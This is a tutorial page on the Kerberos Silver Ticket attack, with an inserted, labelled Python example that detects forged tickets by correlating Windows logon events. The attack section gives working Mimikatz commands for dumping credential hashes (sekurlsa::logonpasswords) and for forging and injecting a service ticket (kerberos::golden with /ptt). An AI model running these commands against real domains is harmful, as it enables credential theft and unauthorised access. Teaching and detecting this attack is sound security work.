
Silver Ticket


About The Attack

A Silver Ticket is a forged Kerberos service ticket (TGS) for a specific service.

  • Unlike a Golden Ticket (which forges TGTs and gives domain-wide access), a Silver Ticket only works for one service on one machine.
  • But it’s much stealthier because it doesn’t involve the Domain Controller (DC) at all. Once you forge the ticket, authentication happens directly between you and the target service.
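Because a forged service ticket is never requested from the DC, one detection approach is to look for Kerberos logons on the service host that have no matching service-ticket request (Event ID 4769) in the DC logs. This is an added example, not part of the original page; the event records are constructed and simplified, and the field names, host-to-account map and 10-hour ticket lifetime are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events with simplified field names (not raw Windows event XML).
# DC_4769: Event ID 4769 (service ticket requested), collected from domain controllers.
DC_4769 = [
    {"time": "2024-05-01T10:00:02", "user": "alice", "service": "web$", "client_ip": "10.0.0.21"},
]
# HOST_4624: Event ID 4624 (successful logon), collected from the service host "web".
HOST_4624 = [
    {"time": "2024-05-01T10:00:05", "user": "alice", "host": "web", "client_ip": "10.0.0.21", "auth": "Kerberos"},
    {"time": "2024-05-01T11:30:00", "user": "UserName", "host": "web", "client_ip": "10.0.0.37", "auth": "Kerberos"},
    {"time": "2024-05-01T11:45:00", "user": "bob", "host": "web", "client_ip": "10.0.0.40", "auth": "NTLM"},
]

# Assumption: service tickets live at most 10 hours, so a legitimate Kerberos logon
# has a 4769 for the same user and service account within that window before it.
TICKET_LIFETIME = timedelta(hours=10)
# Assumption: hypothetical map from host name to the account its service runs as.
SERVICE_ACCOUNT = {"web": "web$"}


def parse(ts):
    return datetime.fromisoformat(ts)


def unmatched_kerberos_logons(host_events, dc_events,
                              lifetime=TICKET_LIFETIME, skew=timedelta(minutes=5)):
    """Return Kerberos logons on a service host with no DC ticket request behind them."""
    issued = {}
    for ev in dc_events:
        key = (ev["user"].lower(), ev["service"].lower())
        issued.setdefault(key, []).append(parse(ev["time"]))
    findings = []
    for ev in host_events:
        if ev["auth"] != "Kerberos":
            continue  # NTLM logons do not present a service ticket
        svc = SERVICE_ACCOUNT.get(ev["host"].lower())
        if svc is None:
            continue  # host not in the map: nothing to correlate against
        logon = parse(ev["time"])
        times = issued.get((ev["user"].lower(), svc.lower()), [])
        # Flag the logon when no ticket request falls inside the lifetime window.
        if not any(logon - lifetime <= t <= logon + skew for t in times):
            findings.append(ev)
    return findings


if __name__ == "__main__":
    for f in unmatched_kerberos_logons(HOST_4624, DC_4769):
        print("no 4769 for", f["user"], "->", f["host"], "from", f["client_ip"], "at", f["time"])
```

A finding is a lead, not proof: gaps in DC log collection produce the same result, so confirm that 4769 auditing is enabled on every DC before relying on it.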

Prerequisites

We need the following information to perform the attack:

  • SPN password hash
  • Domain SID
  • Target SPN
  • Privileged access to a domain machine

How to perform the attack

Extract Hash

We need the hash of the SPN that we want to create the Silver Ticket for.

privilege::debug
sekurlsa::logonpasswords

From the output of the above commands, we can select the service.

Fetch SID

We need the domain SID for the Silver Ticket. We ignore the user's RID in the command result.

whoami /user

Use Mimikatz

Now use Mimikatz to forge a Silver Ticket for the service. The command below uses a web service as the example.

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:domain.com /ptt /target:web.domain.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:UserName

Verify Ticket

We can use PowerShell to check that the ticket has been added to the list.

klist
